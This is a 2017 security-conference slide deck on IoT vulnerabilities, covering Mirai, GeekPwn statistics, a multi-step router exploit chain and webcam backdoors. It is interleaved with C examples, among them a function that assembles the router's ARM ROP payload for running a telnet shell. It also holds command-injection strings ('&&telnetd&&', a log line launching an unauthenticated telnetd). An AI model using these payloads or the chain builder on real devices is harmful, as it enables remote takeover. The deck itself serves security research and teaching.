CSW2017 Yuhao Song + Huiming Liu: cyber_wmd_vulnerable_IoT


  1. Cyber WMD: Vulnerable IoT. Yuhao Song & Huiming Liu, GeekPwn Lab
  2. About Us
     • Yuhao Song (宋宇昊): co-founder and researcher of KEEN; works on the GeekPwn program, focusing on the security of IoT and smart devices
     • Huiming Liu (刘惠明): security researcher at XuanWu Lab, Tencent; IoT and Android security
     • GeekPwn: a security contest and bug bounty program organized by KEEN since 2014
  3. Contents: Situations of IoT Security; Most Vulnerable Categories in IoT; Attack Vectors of IoT; IoT Can Do Evil
  4. Situations of IoT Security
  5. Mirai Incidents (target: traffic)
     • KrebsOnSecurity: 620 Gbps
     • OVH: 1.1 Tbps
     • Dyn: 1.2 Tbps
     • Liberia (ISP): 500 Gbps
     • WikiLeaks
     • Russian banks
     • 100,000 devices
     * Data from "Rise of the Machines: The Dyn Attack Was Just a Practice Run"
     * Picture: DownDetector Level 3 Outage Map, CC BY-SA 4.0
  6. How Does Mirai Attack?
     • Main targets: IoT devices, Wi-Fi routers, IP cameras
     • Attack vector: remote shell; port scan (looking for telnet, ssh, etc.); dictionary attack based on generic and manufacturer default credentials
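The dictionary-attack stage above is the first thing a device's own authentication log sees. The block below is an added example, not code from the talk: it parses constructed telnetd failure lines (the line format, addresses and timestamps are made up for this example) and flags any source that fails a threshold of logins inside a short window, which is the footprint of a scanner working through a default-credential list.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the talk: flag the dictionary-attack stage of a
 * Mirai-style scanner from a device's own authentication log. The line
 * format, addresses and timestamps below are constructed for this example;
 * adapt parse_failed_login() to what the real telnetd/dropbear prints. */

#define MAX_SRC   64
#define THRESHOLD 5     /* failed logins from one source ... */
#define WINDOW    60    /* ... within this many seconds */

static const char *const sample_log[] = {
    "1487486700 telnetd: login failed user=root from=198.51.100.7",
    "1487486701 telnetd: login failed user=admin from=198.51.100.7",
    "1487486701 telnetd: login failed user=root from=198.51.100.7",
    "1487486702 telnetd: login failed user=support from=198.51.100.7",
    "1487486703 telnetd: login failed user=admin from=198.51.100.7",
    "1487486704 telnetd: login failed user=user from=198.51.100.7",
    "1487486710 telnetd: login failed user=root from=203.0.113.9",
    "1487486900 telnetd: login ok user=admin from=192.0.2.20",
    NULL
};

struct src { char ip[40]; long window_start; int fails; int flagged; };

/* Returns 1 and fills ts/ip if the line is a failed telnet login. */
int parse_failed_login(const char *line, long *ts, char *ip, size_t ipsz)
{
    char ipbuf[40];
    if (sscanf(line, "%ld telnetd: login failed user=%*s from=%39s",
               ts, ipbuf) != 2)
        return 0;
    snprintf(ip, ipsz, "%s", ipbuf);
    return 1;
}

/* Counts failures per source in a WINDOW-second window (restarted when a
 * failure arrives after the window has elapsed). Returns the number of
 * sources that reached THRESHOLD; the first such IP is copied to `first`. */
int count_bruteforce_sources(const char *const *lines, char *first, size_t fsz)
{
    struct src tab[MAX_SRC];
    int nsrc = 0, nflag = 0;
    for (int i = 0; lines[i]; i++) {
        long ts;
        char ip[40];
        struct src *s = NULL;
        if (!parse_failed_login(lines[i], &ts, ip, sizeof ip)) continue;
        for (int j = 0; j < nsrc; j++)
            if (strcmp(tab[j].ip, ip) == 0) { s = &tab[j]; break; }
        if (!s) {
            if (nsrc == MAX_SRC) continue;      /* table full: drop */
            s = &tab[nsrc++];
            snprintf(s->ip, sizeof s->ip, "%s", ip);
            s->window_start = ts; s->fails = 0; s->flagged = 0;
        }
        if (ts - s->window_start > WINDOW) { s->window_start = ts; s->fails = 0; }
        s->fails++;
        if (s->fails >= THRESHOLD && !s->flagged) {
            s->flagged = 1;
            if (nflag == 0 && first) snprintf(first, fsz, "%s", s->ip);
            nflag++;
        }
    }
    return nflag;
}

int main(void)
{
    char ip[40] = "";
    int n = count_bruteforce_sources(sample_log, ip, sizeof ip);
    printf("%d brute-force source(s); first: %s\n", n, n ? ip : "-");
    return 0;
}
```

On the sample log the single scanner at 198.51.100.7 crosses the threshold on its fifth failure; the lone failure from 203.0.113.9 and the successful login are ignored. A real Mirai scanner tries dozens of pairs within seconds, so the window can be short; the point of the window is to avoid flagging a legitimate user who mistypes a password a few times over an hour.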
  7. "Smart Routers Arena"
     • In 2014, GeekPwn began to accept router vulnerabilities
     • In Oct. 2015, a special session for routers to reveal their security problems
     • During 2014~2016, 32 router vulnerabilities in 18 top-selling models of 11 brands, covering all the top router brands in China, half of them popular globally; they result in remote root access, not merely a shell through a weak password
     • Our routers are running naked
  8. "Now this is not the end. It is not even the beginning of the end. But it is, perhaps, the end of the beginning." -- Winston Churchill
  9. Situations of IoT Security
     Large amounts of vulnerabilities
     • Emerging market: manufacturers focus on implementing products' core functions while ignoring security
     • On a recruitment website for startups we found 3K+ IoT companies, but none was looking for security engineers
     • Immature standards: manufacturers have no methods to measure and assure their products' security
     Weapon of Mass Destruction
     • Huge number of devices: 8.4 billion in 2017, as estimated by Gartner
     • Always online
     • Abnormal behavior is hard to notice (no or small screen)
     • Close to users' daily life
  10. IoT Vulnerabilities in GeekPwn
     • We noticed security problems in the emerging market and launched GeekPwn in 2014
     • All the vulnerabilities are high risk and result in full control of the target (PWN)
     • Most of the vulnerabilities are easy and straightforward: non-memory 71% vs memory corruption 29%; single-vulnerability exploit 63% vs combo exploit 37%
  11. Most Vulnerable Categories in IoT
  12. Those Pwned: Mirai, IoT, Wi-Fi router, POS machine, digital safe, robot, drone, communication protocol, computer software, IP camera, smart remote control, smart home device, wearable device, video game console, app, mobile phone
  13. Vulnerabilities in different product categories
     • Wi-Fi Router 28%, Mobile Phone 18%, Smart Home Device 15%, IP Camera 11%, App 11%, Digital Safe 4%, POS Machine 3%, Drone 3%, Wearable Device 2%, Video Game Console 2%, Robot 1%, Communication Protocol 1%, Smart Remote Control 1%, other 17%
     [Chart: per category, total vulnerability count and share of memory-corruption vulnerabilities]
     Blind Spot
     • GeekPwn is an open contest; the contestants choose their own targets
     • Fewer vulnerabilities are reported in some categories (especially new ones)
     • Those categories don't require memory corruption attacks
     • They are not necessarily secure, just neglected
  14. Attack Vectors of IoT
  15. All Roads Lead to Pwn (attack vectors by share)
     • Memory Corruption Attacks 31%
     • Insecure Communication Abuse 11%
     • Abuse of Functionality 10%
     • Logical Input Manipulation 9%
     • Code Injection 7%
     • Hard-coded Crypto Key 6%
     • Other 26%: Remote Information Exposure 4%, Spoofing 4%, Security Mechanism Bypass 4%, Remote Shell with No/Weak Auth 4%, Forced Access 3%, Side Channel 3%, other 4%
  16. Insecure Communication Abuse (digital safe, real case in GeekPwn 2016)
     • Vulnerability: sensitive information is transmitted over an unencrypted channel
     • Exploit: sniff to get the credential / session ID, then replay it
     • Tools: network sniffer; MITM HTTP(S) proxy; Ubertooth One (Bluetooth)
  17. Abuse of Functionality (real case in GeekPwn 2015)
     • One step in a case exploiting a combination of 6 vulnerabilities; the purpose is to get a script file onto the target device
     • Vulnerability: a network logging service is enabled on the device and does not filter appropriately before writing the log to the file system
     • Exploit: clear the previous log, then send traffic that creates a log file containing a shell script, e.g. a line such as
       <11> syslog-ng[1787]: 1; /usr/sbin/telnetd -l /bin/ash
       When the log file is later run as a shell script, everything before the `;` is parsed as a harmless failing command and `/usr/sbin/telnetd -l /bin/ash` starts a telnet daemon that hands out a shell without authentication
  18. Logical Input Manipulation (payment service, real case in GeekPwn 2015)
     • Vulnerability: the server side incorrectly trusts a parameter (e.g. user ID) provided by the client
     • Exploit: send the manipulated parameter to the server (e.g. to act as another user). Beep! Paying from Bob's account.
  19. Code Injection (real case in GeekPwn 2016)
     • Vulnerability: a CGI service accepts a parameter that is finally passed to a `system` call without appropriate filtering
     • Exploit: send the request with the parameter `../xxxx/&&telnetd&&` to the CGI; the shell treats `&&` as a command separator and starts telnetd
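Slides 17 and 19 are the same defect seen from two sinks: client-controlled bytes reach a place where a shell later reads them, once as a log line that gets executed as a script and once as a parameter spliced into a `system()` command line. The block below is an added example, not code from the talk or from any vendor's firmware; the function names, the `ls /www/` command template and the 256-byte buffers are assumptions for the illustration. It shows both vulnerable patterns beside a hardened form that shares one metacharacter test.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not the talk's code): two untrusted-input sinks from the
 * slides, each in a vulnerable and a hardened form. Names are illustrative. */

/* Bytes that let a value escape the token the developer intended: control
 * characters plus the shell's separators, quotes, expansions and globs. */
static int is_shell_meta(unsigned char c)
{
    return c < 0x20 || c == 0x7f ||
           strchr(";&|`$()<>\"'\\*?[]{}~", c) != NULL;
}

/* Allow-list for a path parameter: [A-Za-z0-9._-] and '/', and never "..".
 * Rejecting rather than escaping is the right call for a value that ends up
 * on a command line; note the slide-19 payload starts with "../". */
int is_safe_path_param(const char *s)
{
    if (!*s || strstr(s, "..")) return 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '_' ||
                 c == '-' || c == '/';
        if (!ok) return 0;
    }
    return 1;
}

/* Slide 19, vulnerable: the request parameter is spliced straight into the
 * string that goes to system(). Returns the command the shell would see. */
int build_cmd_vuln(char *out, size_t outsz, const char *param)
{
    return snprintf(out, outsz, "ls /www/%s", param);
}

/* Hardened: refuse anything outside the allow-list (-1), so the resulting
 * string contains nothing a shell can read as a separator. */
int build_cmd_safe(char *out, size_t outsz, const char *param)
{
    if (!is_safe_path_param(param)) return -1;
    return snprintf(out, outsz, "ls /www/%s", param);
}

/* Slide 17, vulnerable: the remote message is written to the log verbatim,
 * so "1; /usr/sbin/telnetd -l /bin/ash" becomes a runnable line. */
int log_line_vuln(char *out, size_t outsz, int pid, const char *msg)
{
    return snprintf(out, outsz, "<11> syslog-ng[%d]: %s\n", pid, msg);
}

/* Hardened: metacharacters and control bytes in the message body are written
 * as \xHH, so no log line can ever be a well-formed shell command. */
int log_line_safe(char *out, size_t outsz, int pid, const char *msg)
{
    size_t n = (size_t)snprintf(out, outsz, "<11> syslog-ng[%d]: ", pid);
    if (n >= outsz) { out[outsz - 1] = '\0'; return (int)outsz - 1; }
    for (const unsigned char *p = (const unsigned char *)msg;
         *p && n + 5 < outsz; p++) {
        if (is_shell_meta(*p))
            n += (size_t)snprintf(out + n, outsz - n, "\\x%02x", *p);
        else
            out[n++] = (char)*p;
    }
    if (n + 1 < outsz) out[n++] = '\n';
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    char buf[256];
    const char *param = "../xxxx/&&telnetd&&";
    const char *msg = "1; /usr/sbin/telnetd -l /bin/ash";
    build_cmd_vuln(buf, sizeof buf, param);
    printf("vuln cmd : %s\n", buf);
    printf("safe cmd : %s\n",
           build_cmd_safe(buf, sizeof buf, param) < 0 ? "rejected" : buf);
    log_line_vuln(buf, sizeof buf, 1787, msg);
    printf("vuln log : %s", buf);
    log_line_safe(buf, sizeof buf, 1787, msg);
    printf("safe log : %s", buf);
    return 0;
}
```

For the CGI case the better fix is to avoid the shell entirely (fork/execve with an argv array, or a library call that lists the directory) so that there is no command line to inject into; the allow-list is the defence-in-depth layer when the shell cannot be removed. For the logger, escaping keeps the message readable for operators while guaranteeing that the file cannot double as a script.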
  20. Hard-coded Crypto Key (smart luggage, real case in GeekPwn 2016)
     • Vulnerability: a symmetric-key algorithm is used and the key is hard-coded in the client program
     • Exploit: reverse engineer the client to get the key, then decrypt / encrypt the data
  21. Case Study
  22. Case Chain
     • Get a root shell on a router from the Internet
     • Get the login password of a webcam
     • Compromise your home security alarm
  23. Vulnerability Chains, for Fun & Profit. What makes IoT targets different:
     • Fewer attack surfaces
     • Limited access capabilities
     • Limited compute capabilities
     • Closed-source firmware
     • Cheap, but in huge numbers
  24. Breakthrough
     • Open ports (especially those exposed to the Internet): configuration port 80/443; other ports found with nmap / netstat
     • Other vulnerabilities: DNS cache? MITM? Remotely get a file
  25. Get Open Ports
     • Dynamic method: nmap, netcat, etc. In this case, port 9000 is open. A new feature?
     • Static method: get the firmware; hexdump + grep (regular expression matching); get the binary; reverse it to find the bug behind the port
  26. From Access to Control
     • Reverse the file in IDA
     • Working... more working... more and more working...
     • Finally, get the vulnerabilities
  27. Router A step 0: the ETM process on the router calls the etm_configure function, which parses an INI file; an evil license_server value causes a stack overflow
  28. Router A step 0 (diagram)
  29. Router A step 1: INI file injection replaces the good license_server entry with an evil one
  30. Router A step 2: an unauthorized restart command makes the ETM process reload the INI file with the evil license_server
  31. Router A step 3: a callback parse function misuses the snprintf return value, leaking INI file information
  32. snprintf
  33. Router A step 3 (diagram)
  34. Router A step 3 (diagram)
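The snprintf misuse named on slides 31 and 32 comes from one property of the function: its return value is the length the formatted string would have had, not the number of bytes it actually wrote. The block below is an added example, not the router's code; the 32-byte reply buffer, the INI-style entries and the function names are constructed for it. It shows the offset drifting past the end of the buffer in the vulnerable form, which is what becomes an out-of-bounds read when that offset is used as a length to send back (or an out-of-bounds write once the remaining size wraps), beside the clamped form.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the router's code: the snprintf pattern behind the
 * slide-31 leak. snprintf returns the length the output WOULD have had, not
 * the bytes it wrote, so an offset accumulated from it runs past the buffer.
 * The names, the 32-byte reply buffer and the INI-style entries are made up. */

#define REPLY_SZ 32

/* Constructed entries; together they are longer than REPLY_SZ. */
static const char *const entries[] = {
    "license_server=10.0.0.1", "port=9000", "mode=evil", NULL
};

/* Vulnerable: trusts the return value. Returns the offset the code then
 * uses as "reply length", which can exceed the buffer: bytes beyond it are
 * sent to the client (the leak), and with sz - off wrapped around to a huge
 * size_t the next snprintf writes out of bounds. The break below is a guard
 * added for this demo only, so the example itself never writes past reply. */
int format_reply_vuln(char *reply, size_t sz)
{
    size_t off = 0;
    for (int i = 0; entries[i]; i++) {
        if (off >= sz) break;                      /* demo-only guard */
        off += (size_t)snprintf(reply + off, sz - off, "%s;", entries[i]);
    }
    return (int)off;
}

/* Fixed: compare the return value with the space that was left and stop at
 * the first truncation; the offset never leaves the buffer. */
int format_reply_safe(char *reply, size_t sz)
{
    size_t off = 0;
    for (int i = 0; entries[i]; i++) {
        int n = snprintf(reply + off, sz - off, "%s;", entries[i]);
        if (n < 0) break;                          /* encoding error */
        if ((size_t)n >= sz - off) {               /* truncated: full */
            off = sz - 1;
            break;
        }
        off += (size_t)n;
    }
    return (int)off;
}

int main(void)
{
    char reply[REPLY_SZ];
    int v = format_reply_vuln(reply, sizeof reply);
    printf("vulnerable offset: %d (buffer is %d bytes)\n", v, REPLY_SZ);
    int s = format_reply_safe(reply, sizeof reply);
    printf("safe offset: %d, reply=\"%s\"\n", s, reply);
    return 0;
}
```

With these entries the vulnerable loop reports an offset of 34 for a 32-byte buffer after the second entry is truncated; a caller that sends `off` bytes from `reply` now ships two bytes of whatever sits after the buffer on the stack, and without the demo guard the third call would compute `sz - off` as a huge size and overflow. The fixed loop stops at 31 with the buffer intact.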
  35. Exploit A step 0 / step 1 (summary diagram): INI file injection, then the snprintf return value misuse in the callback parse function leaks INI file information
  36. Router A step 2 / step 3 (summary diagram): etm_configure parses the INI file with the evil license_server and the stack overflows; the unauthorized restart command is what makes the process reload the INI file
  37. Router A Exploit step 0. Stack layout after the overflow, from SP upward: Pop Reg Gadget, 0x42424242, 0x42424242, 0x42424242, system gadget, 0x43434343, Wonderful Gadget, CMD to execute. Pop Reg Gadget:
       26cd0: pop {r0, r1, r2, r3, r4, lr}
       26cd4: bx lr
  38. Router A Exploit step 1. The pop gadget loads R0, R1, R2 (0x42424242), R3 (system), R4 (0x43434343) and LR (Wonderful Gadget) from the stack; bx lr then jumps to the Wonderful Gadget.
  39. Router A Exploit step 2. Wonderful Gadget:
       .text:0003F184 MOV R0, SP
       .text:0003F188 MOV LR, PC
       .text:0003F18C BX R3
     SP now points at the command string (N bytes) that follows the popped words.
  40. Router A Exploit step 3. R0 = SP, i.e. the address of the command to execute; BX R3 calls system with that command.
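Slides 37 to 40 show the chain as a stack picture; the function below lays the same chain out as bytes, as an added example rather than the speakers' exploit code. The two gadget offsets (0x26cd0 for `pop {r0, r1, r2, r3, r4, lr}; bx lr` and 0x3F184 for `mov r0, sp; mov lr, pc; bx r3`) are the ones printed on the slides; the load base, the address of `system`, the 64-byte padding up to the saved LR, and the command string are assumptions for this example. Little-endian ARM, 4-byte words.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the speakers' exploit: the ARM ROP chain of slides 37-40
 * laid out as a byte payload. Gadget offsets are from the slides; the load
 * base, system() address, padding and command are assumed for the demo. */

#define PAD_LEN     64         /* assumed: bytes from buffer start to saved LR */
#define POP_GADGET  0x26cd0u   /* pop {r0, r1, r2, r3, r4, lr}; bx lr */
#define WONDERFUL   0x3f184u   /* mov r0, sp; mov lr, pc; bx r3 */
#define CHAIN_WORDS 7          /* pop gadget + r0 r1 r2 r3 r4 lr */

static size_t put_u32(uint8_t *p, uint32_t v)   /* little-endian store */
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
    return 4;
}

uint32_t chain_word(const uint8_t *p, size_t off) /* little-endian load */
{
    return (uint32_t)p[off] | ((uint32_t)p[off + 1] << 8) |
           ((uint32_t)p[off + 2] << 16) | ((uint32_t)p[off + 3] << 24);
}

/* Builds the payload and returns its length (0 if out is too small).
 * Low address first, i.e. the order the CPU pops it:
 *   padding | saved LR <- pop gadget
 *   r0 r1 r2 = junk | r3 = system | r4 = junk | lr = wonderful gadget
 *   command string: SP points here when the wonderful gadget runs, so
 *   "mov r0, sp" makes it system()'s argument and "bx r3" calls system. */
size_t build_chain(uint8_t *out, size_t outsz, uint32_t base,
                   uint32_t system_addr, const char *cmd)
{
    size_t cmdlen = strlen(cmd) + 1;                 /* system() needs the NUL */
    size_t n = 0;
    if (PAD_LEN + 4 * CHAIN_WORDS + cmdlen > outsz) return 0;
    memset(out, 'A', PAD_LEN);                       n += PAD_LEN;
    n += put_u32(out + n, base + POP_GADGET);        /* overwrites saved LR */
    n += put_u32(out + n, 0x42424242u);              /* r0 (junk) */
    n += put_u32(out + n, 0x42424242u);              /* r1 (junk) */
    n += put_u32(out + n, 0x42424242u);              /* r2 (junk) */
    n += put_u32(out + n, system_addr);              /* r3: target of bx r3 */
    n += put_u32(out + n, 0x43434343u);              /* r4 (junk) */
    n += put_u32(out + n, base + WONDERFUL);         /* lr: target of bx lr */
    memcpy(out + n, cmd, cmdlen);                    n += cmdlen;
    return n;
}

int main(void)
{
    uint8_t buf[256];
    /* Assumed addresses for the demo: load base of the ETM binary, libc system(). */
    size_t n = build_chain(buf, sizeof buf, 0x00008000u, 0x40123456u,
                           "/usr/sbin/telnetd -l /bin/sh");
    for (size_t off = PAD_LEN; off < PAD_LEN + 4 * CHAIN_WORDS; off += 4)
        printf("[+%2zu] 0x%08x\n", off - PAD_LEN, chain_word(buf, off));
    printf("cmd at +%d: %s (payload %zu bytes)\n", PAD_LEN + 4 * CHAIN_WORDS,
           (const char *)buf + PAD_LEN + 4 * CHAIN_WORDS, n);
    return 0;
}
```

Why the two gadgets pair up: after the six pops, SP sits exactly on the first byte of the command string, and `bx lr` lands in the wonderful gadget with R3 already holding `system`. `mov r0, sp` turns that stack address into the argument, `mov lr, pc` gives `system` somewhere to return to, and `bx r3` makes the call. Without ASLR on the ETM binary the gadget offsets are usable directly; if the base is randomized, an information leak like the one on slide 31 supplies it.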
  41. Attack Surface
       Ming: $ nmap -Pn -p8999-9001 xx.xx.xx.xx
       Starting Nmap 6.47 at 2017-02-19 17:25 CST
       Nmap scan report for
       Host is up (0.010s latency).
       PORT     STATE    SERVICE
       8999/tcp filtered bctp
       9000/tcp open     cslistener
       9001/tcp filtered tor-orport
  42. Similar Vulnerabilities
     • Router B (root shell): open port 515 (the LPD printer service), many devices exposed on the Internet; strcpy overflow while parsing queue_name; stack pivot -> leak write@got to bypass ASLR -> ROP to execute system
     • WebCam C (root shell): open port UDP 8600; strcpy overflow (user, passwd), LOL
     • Visit for more information.
  43. Router B on the Internet
  44. Then What?
     • We are in the LAN
     • DDoS tools
     • Traffic monitoring & hijacking
     • More?
     • Watch you, literally: everything is in the attacker's eyes from a pwned webcam
     • WebCam D demo
  45. WebCam D
     • Backdoor 1: send some magic strings and get the administrator's username and password directly
     • Backdoor 2: telnet on the webcam, default telnet backdoor (root, xxxxxx)
     • Visit for more information
  46. What can attackers do?
     • Scan the Internet to find vulnerable devices
     • Get a root shell on the router or webcam
     • Surf the LAN
     • Watch, even control, you through your vulnerable IoT devices
     • Demo video
  47. What may you lose in this case?
     • Your online privacy (even worse over plain HTTP)
     • Your online accounts and passwords (MITM)
     • Your daily-life privacy (obviously)
     • Your credit card information (if you ever showed it within a webcam's view)
     • More?
  48. Information and Property Loss
  49. What can we learn from the demos?
  50. IoT Can Do Evil
  51. IoT Can Be a Peeper
     • Locating the user's child
     • Monitoring network traffic
     • Hijacking network traffic
     • Watching the user, literally
  52. IoT Can Be a Thief
     • Query transactions
     • Steal money
     • Monitor the user's life pattern
     • Turn the user's appliances on/off
     • Disable the intrusion alarm
     • (For fun) send out a Weibo ("Chinese Twitter") post from a smart socket
     • Unlock the user's door
  53. IoT Can Be Hijacked
     • Hijacked to fly away
     • Hijacked to eavesdrop
  54. "God's Eye" in Furious 7
  55. Q&A. Yuhao Song @yuhaos, Huiming Liu @liuhm09, GeekPwn @GeekPwn